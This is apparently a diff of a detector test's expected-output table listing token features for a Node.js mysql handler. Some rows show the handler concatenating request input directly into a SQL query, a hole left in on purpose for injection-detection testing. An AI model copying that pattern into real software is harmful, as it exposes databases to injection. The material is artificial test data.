{}) | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:14:9:16:47 | connect ... ds) {}) | fileImports | express mysql | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:14:9:16:47 | exceptional return of connect ... ds) {}) | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:14:9:16:47 | exceptional return of connect ... ds) {}) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:14:9:16:47 | exceptional return of connect ... ds) {}) | enclosingFunctionBody | req res temp req params value pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = ? values temp error results fields pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = temp error results fields pool getConnection err connection connection query SELECT * FROM `books` WHERE `author` = temp error results fields | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:14:9:16:47 | exceptional return of connect ... ds) {}) | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:14:9:16:47 | exceptional return of connect ... ds) {}) | fileImports | express mysql | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:14:20:14:24 | query | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:14:20:14:24 | query | contextSurroundingFunctionParameters | (req, res)\n(err, connection) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:14:20:14:24 | query | enclosingFunctionBody | req res temp req params value pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = ? values temp error results fields pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = temp error results fields pool getConnection err connection connection query SELECT * FROM `books` WHERE `author` = temp error results fields | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:14:20:14:24 | query | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:14:20:14:24 | query | fileImports | express mysql | | autogenerated/NosqlAndSqlInjection/untyped/mysql.js:14:26:16:9 | {\\n ... } | CalleeFlexibleAccessPath | connection.query | | autogenerated/NosqlAndSqlInjection/untyped/mysql.js:14:26:16:9 | {\\n ... } | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mysql.js:14:26:16:9 | {\\n ... } | contextFunctionInterfaces | handler(req, res) | @@ -3392,6 +16591,27 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mysql.js:14:26:16:9 | {\\n ... } | enclosingFunctionName | handler | | autogenerated/NosqlAndSqlInjection/untyped/mysql.js:14:26:16:9 | {\\n ... } | fileImports | express mysql | | autogenerated/NosqlAndSqlInjection/untyped/mysql.js:14:26:16:9 | {\\n ... } | receiverName | connection | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:15:13:15:15 | sql | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:15:13:15:15 | sql | contextSurroundingFunctionParameters | (req, res)\n(err, connection) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:15:13:15:15 | sql | enclosingFunctionBody | req res temp req params value pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = ? values temp error results fields pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = temp error results fields pool getConnection err connection connection query SELECT * FROM `books` WHERE `author` = temp error results fields | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:15:13:15:15 | sql | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:15:13:15:15 | sql | fileImports | express mysql | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:15:13:15:65 | sql: 'S ... + temp | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:15:13:15:65 | sql: 'S ... + temp | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:15:13:15:65 | sql: 'S ... + temp | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:15:13:15:65 | sql: 'S ... + temp | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:15:13:15:65 | sql: 'S ... + temp | enclosingFunctionBody | req res temp req params value pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = ? values temp error results fields pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = temp error results fields pool getConnection err connection connection query SELECT * FROM `books` WHERE `author` = temp error results fields | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:15:13:15:65 | sql: 'S ... + temp | enclosingFunctionBody | req res temp req params value pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = ? values temp error results fields pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = temp error results fields pool getConnection err connection connection query SELECT * FROM `books` WHERE `author` = temp error results fields | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:15:13:15:65 | sql: 'S ... + temp | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:15:13:15:65 | sql: 'S ... + temp | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:15:13:15:65 | sql: 'S ... + temp | fileImports | express mysql | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:15:13:15:65 | sql: 'S ... + temp | fileImports | express mysql | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:15:18:15:58 | 'SELECT ... or` = ' | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:15:18:15:58 | 'SELECT ... or` = ' | contextSurroundingFunctionParameters | (req, res)\n(err, connection) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:15:18:15:58 | 'SELECT ... or` = ' | enclosingFunctionBody | req res temp req params value pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = ? values temp error results fields pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = temp error results fields pool getConnection err connection connection query SELECT * FROM `books` WHERE `author` = temp error results fields | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:15:18:15:58 | 'SELECT ... or` = ' | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:15:18:15:58 | 'SELECT ... or` = ' | fileImports | express mysql | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:15:18:15:58 | 'SELECT ... or` = ' | stringConcatenatedWith | -endpoint- temp | | autogenerated/NosqlAndSqlInjection/untyped/mysql.js:15:18:15:65 | 'SELECT ... + temp | CalleeFlexibleAccessPath | connection.query | | autogenerated/NosqlAndSqlInjection/untyped/mysql.js:15:18:15:65 | 'SELECT ... + temp | InputAccessPathFromCallee | 0.sql | | autogenerated/NosqlAndSqlInjection/untyped/mysql.js:15:18:15:65 | 'SELECT ... + temp | InputArgumentIndex | 0 | @@ -3401,6 +16621,27 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mysql.js:15:18:15:65 | 'SELECT ... + temp | enclosingFunctionBody | req res temp req params value pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = ? values temp error results fields pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = temp error results fields pool getConnection err connection connection query SELECT * FROM `books` WHERE `author` = temp error results fields | | autogenerated/NosqlAndSqlInjection/untyped/mysql.js:15:18:15:65 | 'SELECT ... + temp | enclosingFunctionName | handler | | autogenerated/NosqlAndSqlInjection/untyped/mysql.js:15:18:15:65 | 'SELECT ... + temp | fileImports | express mysql | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:15:62:15:65 | temp | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:15:62:15:65 | temp | contextSurroundingFunctionParameters | (req, res)\n(err, connection) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:15:62:15:65 | temp | enclosingFunctionBody | req res temp req params value pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = ? values temp error results fields pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = temp error results fields pool getConnection err connection connection query SELECT * FROM `books` WHERE `author` = temp error results fields | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:15:62:15:65 | temp | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:15:62:15:65 | temp | fileImports | express mysql | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:15:62:15:65 | temp | stringConcatenatedWith | 'SELECT * FROM `books` WHERE `author` = ' -endpoint- | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:16:12:16:11 | this | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:16:12:16:11 | this | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:16:12:16:11 | this | enclosingFunctionBody | req res temp req params value pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = ? values temp error results fields pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = temp error results fields pool getConnection err connection connection query SELECT * FROM `books` WHERE `author` = temp error results fields | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:16:12:16:11 | this | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:16:12:16:11 | this | fileImports | express mysql | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:16:12:16:46 | 'arguments' object of anonymous function | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:16:12:16:46 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:16:12:16:46 | 'arguments' object of anonymous function | enclosingFunctionBody | req res temp req params value pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = ? values temp error results fields pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = temp error results fields pool getConnection err connection connection query SELECT * FROM `books` WHERE `author` = temp error results fields | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:16:12:16:46 | 'arguments' object of anonymous function | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:16:12:16:46 | 'arguments' object of anonymous function | fileImports | express mysql | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:16:12:16:46 | exceptional return of anonymous function | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:16:12:16:46 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:16:12:16:46 | exceptional return of anonymous function | enclosingFunctionBody | req res temp req params value pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = ? values temp error results fields pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = temp error results fields pool getConnection err connection connection query SELECT * FROM `books` WHERE `author` = temp error results fields | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:16:12:16:46 | exceptional return of anonymous function | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:16:12:16:46 | exceptional return of anonymous function | fileImports | express mysql | | autogenerated/NosqlAndSqlInjection/untyped/mysql.js:16:12:16:46 | functio ... lds) {} | CalleeFlexibleAccessPath | connection.query | | autogenerated/NosqlAndSqlInjection/untyped/mysql.js:16:12:16:46 | functio ... lds) {} | InputArgumentIndex | 1 | | autogenerated/NosqlAndSqlInjection/untyped/mysql.js:16:12:16:46 | functio ... lds) {} | contextFunctionInterfaces | handler(req, res) | @@ -3409,6 +16650,71 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mysql.js:16:12:16:46 | functio ... lds) {} | enclosingFunctionName | handler | | autogenerated/NosqlAndSqlInjection/untyped/mysql.js:16:12:16:46 | functio ... lds) {} | fileImports | express mysql | | autogenerated/NosqlAndSqlInjection/untyped/mysql.js:16:12:16:46 | functio ... lds) {} | receiverName | connection | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:16:12:16:46 | return of anonymous function | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:16:12:16:46 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:16:12:16:46 | return of anonymous function | enclosingFunctionBody | req res temp req params value pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = ? values temp error results fields pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = temp error results fields pool getConnection err connection connection query SELECT * FROM `books` WHERE `author` = temp error results fields | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:16:12:16:46 | return of anonymous function | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:16:12:16:46 | return of anonymous function | fileImports | express mysql | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:16:21:16:25 | error | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:16:21:16:25 | error | contextSurroundingFunctionParameters | (req, res)\n(err, connection)\n(error, results, fields) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:16:21:16:25 | error | enclosingFunctionBody | req res temp req params value pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = ? values temp error results fields pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = temp error results fields pool getConnection err connection connection query SELECT * FROM `books` WHERE `author` = temp error results fields | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:16:21:16:25 | error | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:16:21:16:25 | error | fileImports | express mysql | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:16:28:16:34 | results | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:16:28:16:34 | results | contextSurroundingFunctionParameters | (req, res)\n(err, connection)\n(error, results, fields) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:16:28:16:34 | results | enclosingFunctionBody | req res temp req params value pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = ? values temp error results fields pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = temp error results fields pool getConnection err connection connection query SELECT * FROM `books` WHERE `author` = temp error results fields | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:16:28:16:34 | results | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:16:28:16:34 | results | fileImports | express mysql | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:16:37:16:42 | fields | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:16:37:16:42 | fields | contextSurroundingFunctionParameters | (req, res)\n(err, connection)\n(error, results, fields) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:16:37:16:42 | fields | enclosingFunctionBody | req res temp req params value pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = ? values temp error results fields pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = temp error results fields pool getConnection err connection connection query SELECT * FROM `books` WHERE `author` = temp error results fields | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:16:37:16:42 | fields | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:16:37:16:42 | fields | fileImports | express mysql | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:18:5:18:8 | pool | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:18:5:18:8 | pool | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:18:5:18:8 | pool | enclosingFunctionBody | req res temp req params value pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = ? values temp error results fields pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = temp error results fields pool getConnection err connection connection query SELECT * FROM `books` WHERE `author` = temp error results fields | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:18:5:18:8 | pool | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:18:5:18:8 | pool | fileImports | express mysql | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:18:5:18:22 | pool.getConnection | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:18:5:18:22 | pool.getConnection | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:18:5:18:22 | pool.getConnection | enclosingFunctionBody | req res temp req params value pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = ? values temp error results fields pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = temp error results fields pool getConnection err connection connection query SELECT * FROM `books` WHERE `author` = temp error results fields | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:18:5:18:22 | pool.getConnection | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:18:5:18:22 | pool.getConnection | fileImports | express mysql | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:18:5:21:6 | exceptional return of pool.ge ... \\n }) | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:18:5:21:6 | exceptional return of pool.ge ... \\n }) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:18:5:21:6 | exceptional return of pool.ge ... \\n }) | enclosingFunctionBody | req res temp req params value pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = ? values temp error results fields pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = temp error results fields pool getConnection err connection connection query SELECT * FROM `books` WHERE `author` = temp error results fields | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:18:5:21:6 | exceptional return of pool.ge ... \\n }) | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:18:5:21:6 | exceptional return of pool.ge ... \\n }) | fileImports | express mysql | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:18:5:21:6 | pool.ge ... \\n }) | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:18:5:21:6 | pool.ge ... \\n }) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:18:5:21:6 | pool.ge ... \\n }) | enclosingFunctionBody | req res temp req params value pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = ? values temp error results fields pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = temp error results fields pool getConnection err connection connection query SELECT * FROM `books` WHERE `author` = temp error results fields | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:18:5:21:6 | pool.ge ... \\n }) | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:18:5:21:6 | pool.ge ... \\n }) | fileImports | express mysql | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:18:10:18:22 | getConnection | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:18:10:18:22 | getConnection | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:18:10:18:22 | getConnection | enclosingFunctionBody | req res temp req params value pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = ? values temp error results fields pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = temp error results fields pool getConnection err connection connection query SELECT * FROM `books` WHERE `author` = temp error results fields | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:18:10:18:22 | getConnection | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:18:10:18:22 | getConnection | fileImports | express mysql | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:18:24:18:23 | temp | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:18:24:18:23 | temp | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:18:24:18:23 | temp | enclosingFunctionBody | req res temp req params value pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = ? values temp error results fields pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = temp error results fields pool getConnection err connection connection query SELECT * FROM `books` WHERE `author` = temp error results fields | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:18:24:18:23 | temp | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:18:24:18:23 | temp | fileImports | express mysql | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:18:24:18:23 | this | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:18:24:18:23 | this | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:18:24:18:23 | this | enclosingFunctionBody | req res temp req params value pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = ? values temp error results fields pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = temp error results fields pool getConnection err connection connection query SELECT * FROM `books` WHERE `author` = temp error results fields | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:18:24:18:23 | this | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:18:24:18:23 | this | fileImports | express mysql | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:18:24:21:5 | 'arguments' object of anonymous function | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:18:24:21:5 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:18:24:21:5 | 'arguments' object of anonymous function | enclosingFunctionBody | req res temp req params value pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = ? values temp error results fields pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = temp error results fields pool getConnection err connection connection query SELECT * FROM `books` WHERE `author` = temp error results fields | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:18:24:21:5 | 'arguments' object of anonymous function | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:18:24:21:5 | 'arguments' object of anonymous function | fileImports | express mysql | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:18:24:21:5 | exceptional return of anonymous function | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:18:24:21:5 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:18:24:21:5 | exceptional return of anonymous function | enclosingFunctionBody | req res temp req params value pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = ? values temp error results fields pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = temp error results fields pool getConnection err connection connection query SELECT * FROM `books` WHERE `author` = temp error results fields | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:18:24:21:5 | exceptional return of anonymous function | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:18:24:21:5 | exceptional return of anonymous function | fileImports | express mysql | | autogenerated/NosqlAndSqlInjection/untyped/mysql.js:18:24:21:5 | functio ... ;\\n } | CalleeFlexibleAccessPath | pool.getConnection | | autogenerated/NosqlAndSqlInjection/untyped/mysql.js:18:24:21:5 | functio ... ;\\n } | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mysql.js:18:24:21:5 | functio ... ;\\n } | calleeImports | mysql | @@ -3418,6 +16724,57 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mysql.js:18:24:21:5 | functio ... ;\\n } | enclosingFunctionName | handler | | autogenerated/NosqlAndSqlInjection/untyped/mysql.js:18:24:21:5 | functio ... ;\\n } | fileImports | express mysql | | autogenerated/NosqlAndSqlInjection/untyped/mysql.js:18:24:21:5 | functio ... ;\\n } | receiverName | pool | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:18:24:21:5 | return of anonymous function | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:18:24:21:5 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:18:24:21:5 | return of anonymous function | enclosingFunctionBody | req res temp req params value pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = ? values temp error results fields pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = temp error results fields pool getConnection err connection connection query SELECT * FROM `books` WHERE `author` = temp error results fields | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:18:24:21:5 | return of anonymous function | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:18:24:21:5 | return of anonymous function | fileImports | express mysql | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:18:33:18:35 | err | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:18:33:18:35 | err | contextSurroundingFunctionParameters | (req, res)\n(err, connection) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:18:33:18:35 | err | enclosingFunctionBody | req res temp req params value pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = ? values temp error results fields pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = temp error results fields pool getConnection err connection connection query SELECT * FROM `books` WHERE `author` = temp error results fields | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:18:33:18:35 | err | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:18:33:18:35 | err | fileImports | express mysql | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:18:38:18:47 | connection | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:18:38:18:47 | connection | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:18:38:18:47 | connection | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:18:38:18:47 | connection | contextSurroundingFunctionParameters | (req, res)\n(err, connection) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:18:38:18:47 | connection | enclosingFunctionBody | req res temp req params value pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = ? values temp error results fields pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = temp error results fields pool getConnection err connection connection query SELECT * FROM `books` WHERE `author` = temp error results fields | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:18:38:18:47 | connection | enclosingFunctionBody | req res temp req params value pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = ? values temp error results fields pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = temp error results fields pool getConnection err connection connection query SELECT * FROM `books` WHERE `author` = temp error results fields | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:18:38:18:47 | connection | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:18:38:18:47 | connection | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:18:38:18:47 | connection | fileImports | express mysql | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:18:38:18:47 | connection | fileImports | express mysql | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:19:9:19:18 | connection | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:19:9:19:18 | connection | contextSurroundingFunctionParameters | (req, res)\n(err, connection) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:19:9:19:18 | connection | enclosingFunctionBody | req res temp req params value pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = ? values temp error results fields pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = temp error results fields pool getConnection err connection connection query SELECT * FROM `books` WHERE `author` = temp error results fields | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:19:9:19:18 | connection | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:19:9:19:18 | connection | fileImports | express mysql | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:19:9:19:24 | connection.query | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:19:9:19:24 | connection.query | contextSurroundingFunctionParameters | (req, res)\n(err, connection) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:19:9:19:24 | connection.query | enclosingFunctionBody | req res temp req params value pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = ? values temp error results fields pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = temp error results fields pool getConnection err connection connection query SELECT * FROM `books` WHERE `author` = temp error results fields | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:19:9:19:24 | connection.query | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:19:9:19:24 | connection.query | fileImports | express mysql | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:19:9:20:48 | connect ... ds) {}) | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:19:9:20:48 | connect ... ds) {}) | contextSurroundingFunctionParameters | (req, res)\n(err, connection) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:19:9:20:48 | connect ... ds) {}) | enclosingFunctionBody | req res temp req params value pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = ? values temp error results fields pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = temp error 